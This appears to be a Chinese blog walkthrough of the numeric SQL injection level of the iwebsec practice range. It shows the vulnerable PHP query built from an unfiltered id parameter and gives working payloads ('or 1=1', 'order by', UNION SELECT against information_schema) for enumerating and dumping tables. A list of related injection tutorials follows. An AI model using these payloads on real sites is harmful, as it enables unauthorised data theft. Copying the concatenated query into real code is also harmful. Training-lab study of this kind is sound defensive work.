iwebsec sql数字型注入

已于 2023-10-30 19:58:02 修改
阅读量267 收藏
点赞数 3
文章标签: 数据库 sql web安全
于 2023-10-30 19:50:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Enrich_Life/article/details/134126472
版权

SQL注入

原理

  1. 不充分的输入验证和过滤:应用程序未对用户输入的数据进行充分的验证和过滤,导致攻击者可以在输入字段中插入恶意SQL代码。
  2. 字符串拼接:应用程序可能会动态地将用户提供的输入与SQL查询拼接在一起,而不是使用参数化查询或预处理语句。这使得攻击者能够在输入中注入SQL代码,改变查询的行为。
  3. 不适当的用户权限:应用程序通常需要连接到数据库,并使用数据库用户的权限来执行查询。如果数据库用户具有过高的权限(例如,具有完全的数据库管理员权限),则攻击者可以利用SQL注入来执行危险的操作,如删除表或获取敏感数据。
  4. 错误的错误处理:应用程序未正确处理SQL查询的错误消息,这使得攻击者能够从错误消息中获得有关数据库结构和查询的信息,从而更容易进行攻击。
  5. 不安全的输入源:应用程序可能会从多个输入源获取数据,包括用户输入、URL参数、Cookie等。如果这些输入源未经适当验证和处理,攻击者可以在任何地方注入恶意SQL代码。

01-数字型注入

打开如下:

在这里插入图片描述

分析代码:

if(isset($_GET['id'])){
	$id=$_GET['id'];

	$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";
		$result=mysql_query($sql);
	}
	else{
		exit();
	}

id 参数无过滤,直接注入即可

or 1=1--+
or 1=1%23 #需要注意这里如果直接用 # 会被url编码,所以用 %23 或 --+

在这里插入图片描述

order by 3%23  #来判断有多少字段
union select 1,2,database()%23 #查询数据库名
union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='iwebsec')%23 #查数据库中的表名
union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')%23 #查表中的列名
union select 1,2,(字段1,字段2) from 数据库名.表名%23 #查看列里的内容

在这里插入图片描述

正在努力…
关注
SQL 数字型注入详解 + iwebsec实例
m0_50917178的博客
12-04 6485
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、SQL 数字型注入原理二、使用步骤1.引入库2.读入数据总结 前言 本文为作者的学习笔记。其中详细记载了作者对于SQL 数字型注入的理解,同时也介绍了利用union联合查询注入成功的完整过程。本文最后作者利用iwebsecWebgoat两个平台来进行实战。如果有不足之处,欢迎指正。 提示:以下是本篇文章正文内容,下面案例可供参考 一、SQL 数字型注入原理 当输入的参数为整型时例如:ID、年龄等。如果此时存在注入漏洞,
安鸾渗透实战平台|SQL数字型注入详细教程
qq_67262179的博客
05-06 1748
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录@[TOC](文章目录) 安鸾渗透实战平台|SQL数字型注入详细教程前言一、Mysql默认的information库基本1.schemata表内容2.tables表内容3.columns表内容二、渗透靶场地址三、mysql渗透步骤1.进入靶场,查看页面基本信息2.判断是否存在注入3.判断是否存在 符号过滤4.判断数据库字段列名数量5.使用联合查询判断显位点6.基本信息收集7.查询指定数据(cms)库下所有的表名8.查询指定表明下的.
[iwebsec]sql注入-数字型
weixin_45965246的博客
09-17 319
首先访问我们的靶场环境:http://192.168.30.171接着访问sql注入漏洞>01-数字型注入靶场环境。
iwebsec--sql注入--数字型注入题解
别打扰我摸鱼
07-25 149
iwebsec-sql注入第一关数字型注入题解
iwebsec sql注入篇(详细过程,完结)
qq_60829702的博客
03-19 2494
iwebsec靶场,SQL注入篇,详细过程,全篇完结
iwebsec--sql注入漏洞
追求卓越,技术流~
11-20 1846
sql注入漏洞
iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入
mooyuan的博客
11-25 2374
iwebsec靶场的SQL注入关卡共13关SQL注入漏洞,覆盖了数字型注入、字符型注入、报错型盲注、布尔型盲注、时间型盲注以及各种过滤绕过的注入,外加上二次注入,是SQL注入知识点覆盖较为全面的一个靶场。SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第一关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的数字型注入,使用union法即可注入成功(3)是否过滤了关键字?很明显通过源码,iwebsec数字型关卡无过滤任何信息。
sql注入数字型注入
08-02
SQL 注入数字型注入 SQL 注入数字型注入是一种常见的 Web 应用安全漏洞,攻击者可以通过构造恶意输入来inject恶意 SQL 语句,访问或修改数据库中的敏感信息。本文将详细介绍数字型注入的概念、原理、检测方法和...
理论篇8:SQL注入(字符型注入数字型注入)
aiojay的博客
05-02 3791
SQL注入(字符型注入数字型注入),Mysql中 int(3) 类型的含义,判断MYSQL注入闭合方式:
sql数字型注入-东塔靶场
qq_27846373的博客
03-26 5381
sql数字型注入-东塔靶场 超级简单,非常适合新手找信心 环境及准备: vmvare安装kali2018,没有2018其他版本kali也行 kali自带的sqlmap 靶场:东塔靶场数字型注入,免费使用的噢,注册一个账号就行 https://labs.do-ta.com/index/course/index?one=15&two=17&three=0&level=0&other=-1&title= 首先打开linux的终端,输入sqlmap就可以启动sqlmap.
iwebsec靶场 SQL注入漏洞通关笔记10- 双重url编码绕过
mooyuan的博客
11-30 3125
打开靶场,url为id=1如下所示SQL注入主要分析几个内容(1)闭合方式是什么?iwebsec的第10关关卡为数字型,无闭合(2)注入类别是什么?这部分是普通的报错型注入(3)是否过滤了关键字?很明显通过源码,iwebsec的第10关卡过滤了select关键字并且进行了双重url解码了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的双重url解码型注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
SQL注入之字符型、数字型注入原理及注入步骤(sqli-labs-master 1-2关)
qiqi_w的博客
11-27 6402
SQL注入之字符型、数字型注入原理及注入步骤 sqli-labs-master 1-2关演示截图
绕过waf mysql爆库_iwebsec刷题记录-SQL注入漏洞
weixin_39928844的博客
02-12 845
被推荐了这个web平台,感觉挺适合新手的,网上搜了下没看到有人写wp,这里本入门萌新来稍微整理下自己解题的过程SQL注入漏洞01-数字型注入http://localhost:32774/sqli/01.php?id=1'发现有报错You have an error in your SQL syntax; check the manual that corresponds to your MySQL...
搭建开源漏洞靶场iwebsec
zonei123的博客
01-07 3837
搭建开源漏洞靶场iwebsec
简单的数字型sql注入漏洞
北冥有鱼
03-24 1719
1.判断是否存在注入点 以pikachu靶场上的数字型注入漏洞为例 可以看出,这是一个注入点,我们想要知道这个注入点有没有漏洞,可以先行根据经验与知识判断这个信息是在后台怎样运行的,是以什么样的方式存放的。 我们可以先自己预测一下这个参数代码的逻辑。 首先我们是在网页上提交了一个id返回到了后端,后端返回了一个名称和邮箱,正常情况下,所有用户的数据应该是存放在数据库里面的,所以当我们输入了一个1...
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字型注入
lvx++的博客
01-22 3808
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库名 ?id=-1 union sele
在docker中安装sqli-abls/iwebsec教程(完美解决在kali-linux-2020.1/ubuntu16.04下使用docker容器加载镜像速度过慢的问题)
qq_40671478的博客
07-22 2154
我一开始准备在kali-linux-2020.1搭建靶机iwebsecsqli-libs,后来因为在docker里面拉取镜像速度太慢.参考网上的一篇教程vim创建一个配置文件然后kali崩了(我的心态也特么崩了).最后我又转战乌班图,个人建议以后玩docker还是在乌班图上面比较丝滑... 1.修改国内更新源方便安装docker 终端输入命令vim /etc/apt /sources.list 写入国内更新源地址: deb http://mirrors.aliyun.com/ubunt...
oceanbase V4.2.2社区版集群离线部署
最新发布
king_harry的专栏
11-01 830
版本,选择是上传文件,包含oceanbase-ce、oceanbase-ce-libs、oceanbase-ce-utils。关闭时展示,为 OBProxy 集群的访问地址,仅用于生成租户的连接串,不影响实际使用,需要自主配置负载均衡,如果是 VIP 地址,还需要您自主申请并绑定到 OBProxy Server。集群配置选项卡—更多配置—更改系统内存保留选项,默认是30G,如果测试机内存只有16G,则需要调小,本测试调整为2G,这样ocp-server安装不会失败。自定义待管理的集群的名称。
Redis实战-利用Lua解决批量插入防重方案
葵续浅笑的博客
11-01 1185
本文介绍了以Lua脚本为基础设计的防重和幂等方案。
pikachu sql数字型注入
06-21
Pikachu SQL数字型注入通常指的是SQL注入攻击的一种形式,攻击者利用用户输入中包含的数字来进行恶意SQL查询。在Web应用程序中,如果对用户输入的数字字段没有进行充分的验证和过滤,就可能导致这种类型的注入攻击。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值